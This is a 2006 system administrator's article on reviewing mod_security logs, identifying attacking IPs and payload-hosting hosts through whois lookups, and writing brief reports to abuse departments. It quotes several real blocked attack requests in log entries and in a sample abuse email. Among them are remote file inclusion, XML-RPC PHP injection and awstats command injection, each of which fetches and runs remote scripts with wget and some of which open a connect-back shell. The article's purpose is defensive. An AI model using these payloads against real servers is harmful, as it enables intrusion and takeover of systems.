By Peter M. Abraham, Senior Server and Security Administrator at Dynamic Net, Inc.
January 25, 2006
Security, especially on the Internet where random attacks are so prevalent, should be done in as many practical layers as one can manage frequently (often daily).
One of those security measures should be tattling – emailing the abuse departments of hackers as well as those who host payload files used by hackers.
As you look through your log files, you may be in the habit of doing what I do, “hahah, got ya” when you see an attack blocked through mod_security from http://www.modsecurity.org/ or through other means.
But if you are in the good discipline of reviewing your log files frequently and thoroughly you will see the same attacking IP and sites hosting the hackware they use over and over again.
If you manage multiple servers across geographic and data center boundaries, you will see the same attacker and the same sites hosting the hackware – yes, they are targeting broader and broader ranges.
It is due to the growing broadness of attacks -- they are not just attacking your server, your cluster, your data center --, and the fact that what security measures worked today – gotcha – may not work tomorrow (or one second from now), that I strongly recommend tattling.
Tattling is looking up the abuse email address of each offending IP address – the attacker, and every single IP or site they are trying to get their hackware (also known as malware or kits or payloads) to the appropriate IP owners.
We need some Web-based help to identify the IP and site owners. The help will come from the following Web locations:
http://www.apnic.net/search/index.html - APIC – lookup Asia Pacific-based IP addresses
http://www.arin.net/whois/index.html - ARIN’s – lookup U.S. and Canada-based IP addresses
http://lacnic.net/sp/ - LACNIC – lookup South America-based IP addresses
http://www.ripe.net/whois/ - RIPE – lookup European-based IP addresses
http://www.dnsstuff.com/ - DNS Stuff – lookup DNS A records of attackers based on domain name.
Now, let’s move on to the log files. In this article we will deal with logwatch at http://www.logwatch.org/ , and specifically entries from mod_security.
mod_security is an Apache module from http://www.modsecurity.org/ which is a blessing to everyone who wants to defend against Apache-based attacks including PHP and CGI-based attacks.
If you are not familiar with mod_security, I highly recommend you visit the site, read the documentation, and start working with this awesome security tool.
This is a real mod_security entry with the only change being that of masking our customer’s ip / domain:
Request: [your customer's domain or IP without brackets] 209.250.116.251 - - [24/Jan/2006:21:49:21 -0500] "
GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&
_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://12.196.192.16/cmd.gif?
&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback
%20217.160.242.90%208081;echo%20YYY;echo| HTTP/1.1" 500 545 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1;)" Q9bnMdGtgsYAAFwvUIk "-"
Let’s identify the attacker and hosted payload IP addresses:
209.250.116.251 – attacker
12.196.192.16 – hosted payload
216.103.82.214 – hosted payload
217.160.242.90 – hosted payload
Now, for each one use the appropriate IP owner lookup Web-based form:
http://ws.arin.net/cgi-bin/whois.pl?queryinput=!%20NET-209-250-116-192-1 is the end result of putting 209.250.116.251 in http://www.arin.net/whois/index.html
This IP is owned by Meserve, Mumpers & Hughes LLP under DSL.net, Inc.
12.196.192.16 and 216.103.82.214 are also U.S.-based. 217.160.242.90 is European-based.
http://ws.arin.net/cgi-bin/whois.pl?queryinput=!%20NET-12-196-188-0-1 shows AT&T owns 12.196.192.16
http://ws.arin.net/cgi-bin/whois.pl?queryinput=!%20NET-216-103-80-0-1 shows ADSL BASIC under SBC Internet Services as the owners.
Here’s another mod_security entry where the payloads are referenced by domain name rather than IP address:
Request: [your customer's domain or IP without brackets] 200.28.128.21 - - [23/Jan/2006:10:38:13 -0600] "
GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=
&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;
GET%20http://www.albanian.ch/anon/sess3023_%20>%20sess3023_;perl%20sess3023_
;rm%20-rf%20sess3023*? HTTP/1.1" 500 544 "-" "Mozilla/5.0" Q9UGdULYfxoAADbVKDc "-"
Let’s identify the attacker and hosted payload IP addresses:
200.28.128.21 – attacker
www.s0l4r1sr0x.com – hosted payload
www.albanian.ch – hosted payload
You can use the nslookup tool on http://www.dnsstuff.com to find the IP addresses that are involved.
http://www.dnsstuff.com/tools/lookup.ch?name=www.s0l4r1sr0x.com+&type=A shows you www.s0l4r1sr0x.com uses a range of IP addresses from 207.217.96.28 to 207.217.96.45
http://www.arin.net/whois/index.htm will show you those IP addresses are owned by EarthLink Network, Inc.
http://www.dnsstuff.com/tools/lookup.ch?name=www.albanian.ch&type=A shows the IP address for this domain; and the IP per arin.net is owned by ThePlanet.com Internet Services, Inc.
What about entries where the attacker is trying to use XML RPC vulnerabilities where the attackers IP is in the request line, but the payload request might be buried.
Request: [your customer's domain or IP without brackets] 212.33.82.163 - -
[24/Jan/2006:18:39:03 -0500] "POST /drupal/xmlrpc.php HTTP/1.1" 500 555 "-" "
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" Q9a6l9GtgxMAACAbECw "-"
----------------------------------------
POST /drupal/xmlrpc.php HTTP/1.1
Content-Length: 269
Content-Type: text/xml
Host: 209.173.131.20
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
mod_security-action: 500
mod_security-message: Access denied with code 500. Pattern match "xmlrpc" at REQUEST_URI
259
<?xml version="1.0"?><methodCall><methodName>test.method</methodName>
<params><param><value><name>',''));echo '_begin_';echo `cd /tmp;
wget 194.102.194.115/scripo;chmod +x scripo;./scripo `;echo '_end_';exit;/
*</name></value></param></params></methodCall>
Let’s identify the attacker and hosted payload IP addresses:
212.33.82.163 – attacker
194.102.194.115 – hosted payload
Both of these IP addresses can be looked up by RIPE’s lookup tool at http://www.ripe.net/whois/
212.33.82.163 is owned by “CITY” in Poland, and 194.102.194.115 by GMB Computers in Romania.
Here's one where the payload IP is harder to find due to using hex to attempt to mask the IP address of the hosted payload:
Request: [your customer's domain or IP without brackets] 69.88.135.20 - -
[25/Jan/2006:10:32:11 -0500] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%
3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20
%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 500 530 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1;)" Q9eZ@tGtgggAAFR1yMw "-"
Handler: cgi-script
Let’s identify the attacker and hosted payload IP addresses:
69.88.135.20 -- attacker
194.102.194.115 -- hosted payload
BTW, notice the hosted payload for the awstats attack is the same one used in
the XML attack --> GMB Computers in Romania.
Ok, so now you have at the very least a rough idea on identifying the hacker, and the sites hosting payloads the hacker is trying to download to the server to help them compromise the server, what about tattling?
When you look up the IP ownership using http://www.apnic.net/search/index.html or http://www.arin.net/whois/index.html or http://www.arin.net/whois/index.html or http://www.ripe.net/whois/ the output includes the abuse email address.
Most of the time this email is abuse@[mail server machine name or domain name]; sometimes as in the case of GMB Computers mentioned above, you will see only one email address, and its that of a person vs. a department.
In either case, first look for the abuse email address, and next other email addresses.
Now, let’s move onto the composition of the email to the abuse person or department
You will want to create short, clear, and concise emails that provide a solid picture of the problem without overwhelming the recipient.
You are not the only one emailing the abuse person or department as they often handle spam complaints, and other types of complaints. Some companies are short staffed so the person handling this job may be overworked, and underpaid.
You want to give them solid reasons for dealing with your email, and doing any work on their quickly.
Therefore, be sure that your email has the following foundation points:
Using the right foundation, your email should be brief.
I recommend one to no more than three sample log entries with at least one to no more than two blank lines between each long sample.
Do not expect them to have read this article or to do their homework; so, be sure to separately include the IP address or domain name they are hosting.
Be sure to ask them to take appropriate action without demanding from them the specific action you want them to take. Sure we want the hackware deleted, but that is their decision to make.
Here’s an example of an email we sent recently to abuse@schlund.com
=== START OF EMAIL TO ABUSE
Greetings:
RE: http://www.ripe.net/whois?form_type=simple&full_query_string=&searchtext=217.160.242.90&do_search=Search
IP Address: 217.160.242.90
Sample log entry:
Request: [site we host – our customer] 209.250.116.251 - - [24/Jan/2006:21:49:21 -0500] "
GET /index2.php?option=com_content&do_pdf=1&id=1index2.php
?_REQUEST[option]=com_content&_REQUEST[Itemid]=1
&GLOBALS=&mosConfig_absolute_path=http://12.196.192.16/cmd.gif?
&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback
;./cback%20217.160.242.90%208081;echo%20YYY;echo| HTTP/1.1" 500 545
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
Q9bnMdGtgsYAAFwvUIk "-"
Please note the 217.160.242.90%208081 request for a hackware file.
Please take appropriate action.
Thank you.
________________________________________________
Peter M. Abraham, Support and Customer Care Department
Dynamic Net, Inc.
13 Cowpath
Denver PA 17517
Voice: 1-717-484-1062
________________________________________________
=== END OF EMAIL TO ABUSE
Now, go tattle on some attackers.
Thank you.
About Dynamic Net, Inc.
Dynamic Net, Inc. is a privately held, Pennsylvania Corporation, focusing on helping companies do business on the Internet. Part of Dynamic Net's focus includes helping Parallels H-Sphere hosting providers secure their hosting environment. This security help comes in many forms including the Positive Software endorsed and published Parallels H-Sphere security how-to documents, heavy volunteer participation in the Parallels H-Sphere community forum, and contract work covering Parallels H-Sphere server administration and security services.
